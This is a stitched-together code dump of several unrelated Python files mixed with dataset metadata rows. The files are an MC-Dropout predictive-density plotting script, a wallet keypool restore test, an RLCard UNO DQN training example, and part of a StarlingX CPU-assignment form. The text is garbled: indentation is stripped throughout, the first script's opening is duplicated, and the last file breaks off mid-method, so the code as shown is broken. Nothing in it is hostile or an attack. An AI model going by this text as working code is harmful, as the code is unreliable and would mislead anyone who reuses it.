false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
with open("../HMC/false_prob_values.pkl", "rb") as file: # (needed for python3)
false_prob_values_HMC = pickle.load(file) # (shape: (60, 60))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| 32.971698
| 171
| 0.731903
|
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
M = 4
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
network.eval()
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
for x_2_i, x_2_value in enumerate(x_values):
x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda()
mean_prob_vector = np.zeros((2, ))
for i in range(M):
logits = network(x)
prob_vector = F.softmax(logits, dim=1)
prob_vector = prob_vector.data.cpu().numpy()[0]
mean_prob_vector += prob_vector/M_float
false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
with open("../HMC/false_prob_values.pkl", "rb") as file:
false_prob_values_HMC = pickle.load(file)
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| true
| true
|
f7191b74ad043bf5a88f00d42e710de35f6e22dd
| 2,969
|
py
|
Python
|
test/functional/wallet_keypool_topup.py
|
ORO-mlm/ORO-Core
|
770e4728e1b67023f2f52da2850e058732e7583f
|
[
"MIT"
] | null | null | null |
test/functional/wallet_keypool_topup.py
|
ORO-mlm/ORO-Core
|
770e4728e1b67023f2f52da2850e058732e7583f
|
[
"MIT"
] | null | null | null |
test/functional/wallet_keypool_topup.py
|
ORO-mlm/ORO-Core
|
770e4728e1b67023f2f52da2850e058732e7583f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test HD Wallet keypool restore function.
Two nodes. Node1 is under test. Node0 is providing transactions and generating blocks.
- Start node1, shutdown and backup wallet.
- Generate 110 keys (enough to drain the keypool). Store key 90 (in the initial keypool) and key 110 (beyond the initial keypool). Send funds to key 90 and key 110.
- Stop node1, clear the datadir, move wallet file back into the datadir and restart node1.
- connect node1 to node0. Verify that they sync and node1 receives its funds."""
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-keypool=3'], ['-keypool=100']]
def run_test(self):
isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
self.tmpdir = self.options.tmpdir
self.nodes[0].generate(101)
self.log.info("Make backup of wallet")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.log.info("Generate keys for wallet")
for _ in range(90):
addr_oldpool = self.nodes[1].getnewaddress()
for _ in range(20):
addr_extpool = self.nodes[1].getnewaddress()
self.log.info("Send funds to wallet")
self.nodes[0].sendtoaddress(addr_oldpool, 10)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(addr_extpool, 5)
self.nodes[0].generate(1)
self.sync_blocks()
self.log.info("Restart node with wallet backup")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
self.log.info("Verify keypool is restored and balance is correct")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.sync_all()
# wallet was not backupped after emptying the key pool.
# Legacy wallet can't recover funds in addr_extpool
recoveredBalance = 10 if isLegacyWallet else 15
assert_equal(self.nodes[1].getbalance(), recoveredBalance)
assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
# Check that we have marked all keys up to the used keypool key as used
if not isLegacyWallet:
assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
KeypoolRestoreTest().main()
| 37.582278
| 164
| 0.67969
|
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-keypool=3'], ['-keypool=100']]
def run_test(self):
isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
self.tmpdir = self.options.tmpdir
self.nodes[0].generate(101)
self.log.info("Make backup of wallet")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.log.info("Generate keys for wallet")
for _ in range(90):
addr_oldpool = self.nodes[1].getnewaddress()
for _ in range(20):
addr_extpool = self.nodes[1].getnewaddress()
self.log.info("Send funds to wallet")
self.nodes[0].sendtoaddress(addr_oldpool, 10)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(addr_extpool, 5)
self.nodes[0].generate(1)
self.sync_blocks()
self.log.info("Restart node with wallet backup")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
self.log.info("Verify keypool is restored and balance is correct")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.sync_all()
recoveredBalance = 10 if isLegacyWallet else 15
assert_equal(self.nodes[1].getbalance(), recoveredBalance)
assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
# Check that we have marked all keys up to the used keypool key as used
if not isLegacyWallet:
assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
KeypoolRestoreTest().main()
| true
| true
|
f7191b7831ff3bb9f706d295c3c5cdd09d24319d
| 2,516
|
py
|
Python
|
examples/uno_single.py
|
drunkpig/rlcard
|
db8a410bbfefb7f9fd958239aae8d79a8bfb29d3
|
[
"MIT"
] | null | null | null |
examples/uno_single.py
|
drunkpig/rlcard
|
db8a410bbfefb7f9fd958239aae8d79a8bfb29d3
|
[
"MIT"
] | null | null | null |
examples/uno_single.py
|
drunkpig/rlcard
|
db8a410bbfefb7f9fd958239aae8d79a8bfb29d3
|
[
"MIT"
] | 1
|
2020-11-20T16:38:37.000Z
|
2020-11-20T16:38:37.000Z
|
''' A toy example of training single-agent algorithm on Leduc Hold'em
The environment can be treated as normal OpenAI gym style single-agent environment
'''
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
# Make environment
env = rlcard.make('uno', config={'single_agent_mode':True})
eval_env = rlcard.make('uno', config={'single_agent_mode':True})
# Set the iterations numbers and how frequently we evaluate the performance
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000
# The intial memory size
memory_init_size = 1000
# Train the agent every X steps
train_every = 1
# The paths for saving the logs and learning curves
log_dir = './experiments/uno_single_dqn_result/'
# Set a global seed
set_global_seed(0)
with tf.Session() as sess:
# Initialize a global step
global_step = tf.Variable(0, name='global_step', trainable=False)
# Set up the agents
agent = DQNAgent(sess,
scope='dqn',
action_num=env.action_num,
replay_memory_init_size=memory_init_size,
train_every=train_every,
state_shape=env.state_shape,
mlp_layers=[128,128])
# Initialize global variables
sess.run(tf.global_variables_initializer())
# Init a Logger to plot the learning curve
logger = Logger(log_dir)
state = env.reset()
for timestep in range(timesteps):
action = agent.step(state)
next_state, reward, done = env.step(action)
ts = (state, action, reward, next_state, done)
agent.feed(ts)
if timestep % evaluate_every == 0:
rewards = []
state = eval_env.reset()
for _ in range(evaluate_num):
action, _ = agent.eval_step(state)
_, reward, done = env.step(action)
if done:
rewards.append(reward)
logger.log_performance(env.timestep, np.mean(rewards))
# Close files in the logger
logger.close_files()
# Plot the learning curve
logger.plot('DQN')
# Save model
save_dir = 'models/uno_single_dqn'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
saver = tf.train.Saver()
saver.save(sess, os.path.join(save_dir, 'model'))
| 29.255814
| 86
| 0.657393
|
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
env = rlcard.make('uno', config={'single_agent_mode':True})
eval_env = rlcard.make('uno', config={'single_agent_mode':True})
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000
memory_init_size = 1000
train_every = 1
log_dir = './experiments/uno_single_dqn_result/'
set_global_seed(0)
with tf.Session() as sess:
global_step = tf.Variable(0, name='global_step', trainable=False)
agent = DQNAgent(sess,
scope='dqn',
action_num=env.action_num,
replay_memory_init_size=memory_init_size,
train_every=train_every,
state_shape=env.state_shape,
mlp_layers=[128,128])
sess.run(tf.global_variables_initializer())
logger = Logger(log_dir)
state = env.reset()
for timestep in range(timesteps):
action = agent.step(state)
next_state, reward, done = env.step(action)
ts = (state, action, reward, next_state, done)
agent.feed(ts)
if timestep % evaluate_every == 0:
rewards = []
state = eval_env.reset()
for _ in range(evaluate_num):
action, _ = agent.eval_step(state)
_, reward, done = env.step(action)
if done:
rewards.append(reward)
logger.log_performance(env.timestep, np.mean(rewards))
logger.close_files()
logger.plot('DQN')
save_dir = 'models/uno_single_dqn'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
saver = tf.train.Saver()
saver.save(sess, os.path.join(save_dir, 'model'))
| true
| true
|
f7191be16d1b89c72207a7ef5c87366a86c4b09c
| 17,228
|
py
|
Python
|
starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py
|
NaiveOpenStack/stx-gui
|
11b75559f0dea9dd7b5807353cb6141903d1ab4e
|
[
"Apache-2.0"
] | 1
|
2018-09-18T11:10:53.000Z
|
2018-09-18T11:10:53.000Z
|
starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py
|
NaiveOpenStack/stx-gui
|
11b75559f0dea9dd7b5807353cb6141903d1ab4e
|
[
"Apache-2.0"
] | null | null | null |
starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py
|
NaiveOpenStack/stx-gui
|
11b75559f0dea9dd7b5807353cb6141903d1ab4e
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2013-2015 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse # noqa
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
host = forms.CharField(label=_("host"),
required=False,
widget=forms.widgets.HiddenInput)
host_id = forms.CharField(label=_("host_id"),
required=False,
widget=forms.widgets.HiddenInput)
platform = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
platform_processor0 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
platform_processor1 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
platform_processor2 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
platform_processor3 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
vswitch = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_cores_on_processor0 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor1 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor2 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor3 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
shared_vcpu = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_shared_on_processor0 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor1 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor2 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor3 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
self.host = kwargs['initial']['host']
if kwargs['initial']['platform_processor0'] == 99: # No Processor
self.fields[
'platform_processor0'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields['platform_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor1'] == 99: # No Processor
self.fields[
'platform_processor1'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields['platform_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor2'] == 99: # No Processor
self.fields[
'platform_processor2'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields['platform_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor2'].help_text = \
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor3'] == 99: # No Processor
self.fields[
'platform_processor3'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields['platform_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor3'].help_text = \
"Processor 3 has %s physical cores." % avail_socket_cores
if 'compute' not in self.host.subfunctions:
self.fields['vswitch'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor0'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor1'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor2'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor3'].widget = forms.widgets.HiddenInput()
else:
if kwargs['initial'][
'num_cores_on_processor0'] == 99: # No Processor
self.fields[
'num_cores_on_processor0'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields[
'num_cores_on_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor1'] == 99: # No Processor
self.fields[
'num_cores_on_processor1'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields[
'num_cores_on_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor2'] == 99: # No Processor
self.fields[
'num_cores_on_processor2'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields[
'num_cores_on_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor2'].help_text =\
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor3'] == 99: # No Processor
self.fields[
'num_cores_on_processor3'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields[
'num_cores_on_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor3'].help_text =\
"Processor 3 has %s physical cores." % avail_socket_cores
for s in range(0, 4):
processor = 'num_shared_on_processor{0}'.format(s)
if ('compute' not in self.host.subfunctions or
kwargs['initial'][processor] == 99): # No Processor
self.fields[processor].widget = forms.widgets.HiddenInput()
else:
self.fields[processor].set_max_value(1)
self.fields[processor].help_text =\
"Each processor can have at most one shared core."
def clean(self):
cleaned_data = super(UpdateCpuFunctions, self).clean()
# host_id = cleaned_data.get('host_id')
try:
cleaned_data['platform_processor0'] = str(
cleaned_data['platform_processor0'])
cleaned_data['platform_processor1'] = str(
cleaned_data['platform_processor1'])
cleaned_data['platform_processor2'] = str(
cleaned_data['platform_processor2'])
cleaned_data['platform_processor3'] = str(
cleaned_data['platform_processor3'])
cleaned_data['num_cores_on_processor0'] = str(
cleaned_data['num_cores_on_processor0'])
cleaned_data['num_cores_on_processor1'] = str(
cleaned_data['num_cores_on_processor1'])
cleaned_data['num_cores_on_processor2'] = str(
cleaned_data['num_cores_on_processor2'])
cleaned_data['num_cores_on_processor3'] = str(
cleaned_data['num_cores_on_processor3'])
cleaned_data['num_shared_on_processor0'] = str(
cleaned_data['num_shared_on_processor0'])
cleaned_data['num_shared_on_processor1'] = str(
cleaned_data['num_shared_on_processor1'])
cleaned_data['num_shared_on_processor2'] = str(
cleaned_data['num_shared_on_processor2'])
cleaned_data['num_shared_on_processor3'] = str(
cleaned_data['num_shared_on_processor3'])
num_platform_cores = {}
num_platform_cores[0] = cleaned_data.get('platform_processor0',
'None')
num_platform_cores[1] = cleaned_data.get('platform_processor1',
'None')
num_platform_cores[2] = cleaned_data.get('platform_processor2',
'None')
num_platform_cores[3] = cleaned_data.get('platform_processor3',
'None')
num_vswitch_cores = {}
num_vswitch_cores[0] = cleaned_data.get('num_cores_on_processor0',
'None')
num_vswitch_cores[1] = cleaned_data.get('num_cores_on_processor1',
'None')
num_vswitch_cores[2] = cleaned_data.get('num_cores_on_processor2',
'None')
num_vswitch_cores[3] = cleaned_data.get('num_cores_on_processor3',
'None')
num_shared_on_map = {}
num_shared_on_map[0] = cleaned_data.get('num_shared_on_processor0',
'None')
num_shared_on_map[1] = cleaned_data.get('num_shared_on_processor1',
'None')
num_shared_on_map[2] = cleaned_data.get('num_shared_on_processor2',
'None')
num_shared_on_map[3] = cleaned_data.get('num_shared_on_processor3',
'None')
if ('None' in num_platform_cores.values() or
'None' in num_vswitch_cores.values() or
'None' in num_shared_on_map.values()):
raise forms.ValidationError(_("Invalid entry."))
except Exception as e:
LOG.error(e)
raise forms.ValidationError(_("Invalid entry."))
# Since only vswitch is allowed to be modified
cleaned_data['function'] = 'vswitch'
# NOTE: shared_vcpu can be changed
return cleaned_data
def handle(self, request, data):
host_id = data['host_id']
del data['host_id']
del data['host']
try:
host = sysinv.host_get(self.request, host_id)
cpudata = {}
sharedcpudata = {}
platformcpudata = {}
for key, val in data.items():
if 'num_cores_on_processor' in key or 'function' in key:
if key not in self.fields:
cpudata[key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
cpudata[key] = val
if 'platform_processor' in key:
update_key = 'num_cores_on_processor' + key[-1:]
if key not in self.fields:
platformcpudata[update_key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
platformcpudata[update_key] = val
if 'num_shared_on_processor' in key:
key2 = key.replace('shared', 'cores')
if key not in self.fields:
sharedcpudata[key2] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
sharedcpudata[key2] = val
sharedcpudata['function'] = 'shared'
platformcpudata['function'] = 'platform'
sysinv.host_cpus_modify(request, host.uuid,
platformcpudata,
cpudata,
sharedcpudata)
msg = _('CPU Assignments were successfully updated.')
LOG.debug(msg)
messages.success(request, msg)
return self.host.cpus
except exc.ClientException as ce:
# Display REST API error message on UI
messages.error(request, ce)
LOG.error(ce)
# Redirect to failure pg
redirect = reverse(self.failure_url, args=[host_id])
return shortcuts.redirect(redirect)
except Exception as e:
LOG.exception(e)
msg = _('Failed to update CPU Assignments.')
LOG.info(msg)
redirect = reverse(self.failure_url, args=[host_id])
exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
host_id = forms.CharField(widget=forms.widgets.HiddenInput)
profilename = forms.CharField(label=_("Cpu Profile Name"),
required=True)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(AddCpuProfile, self).__init__(*args, **kwargs)
def clean(self):
cleaned_data = super(AddCpuProfile, self).clean()
# host_id = cleaned_data.get('host_id')
return cleaned_data
def handle(self, request, data):
cpuProfileName = data['profilename']
try:
cpuProfile = sysinv.host_cpuprofile_create(request, **data)
msg = _(
'Cpu Profile "%s" was successfully created.') % cpuProfileName
LOG.debug(msg)
messages.success(request, msg)
return cpuProfile
except exc.ClientException as ce:
# Display REST API error message on UI
messages.error(request, ce)
LOG.error(ce)
# Redirect to failure pg
redirect = reverse(self.failure_url, args=[data['host_id']])
return shortcuts.redirect(redirect)
except Exception:
msg = _('Failed to create cpu profile "%s".') % cpuProfileName
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['host_id']])
exceptions.handle(request, msg, redirect=redirect)
| 43.07
| 79
| 0.557755
|
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
host = forms.CharField(label=_("host"),
required=False,
widget=forms.widgets.HiddenInput)
host_id = forms.CharField(label=_("host_id"),
required=False,
widget=forms.widgets.HiddenInput)
platform = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
platform_processor0 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
platform_processor1 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
platform_processor2 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
platform_processor3 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
vswitch = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_cores_on_processor0 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor1 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor2 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor3 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
shared_vcpu = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_shared_on_processor0 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor1 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor2 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor3 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
self.host = kwargs['initial']['host']
if kwargs['initial']['platform_processor0'] == 99:
self.fields[
'platform_processor0'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields['platform_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor1'] == 99:
self.fields[
'platform_processor1'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields['platform_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor2'] == 99:
self.fields[
'platform_processor2'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields['platform_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor2'].help_text = \
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor3'] == 99:
self.fields[
'platform_processor3'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields['platform_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor3'].help_text = \
"Processor 3 has %s physical cores." % avail_socket_cores
if 'compute' not in self.host.subfunctions:
self.fields['vswitch'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor0'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor1'].widget = forms.widgets.HiddenInput()
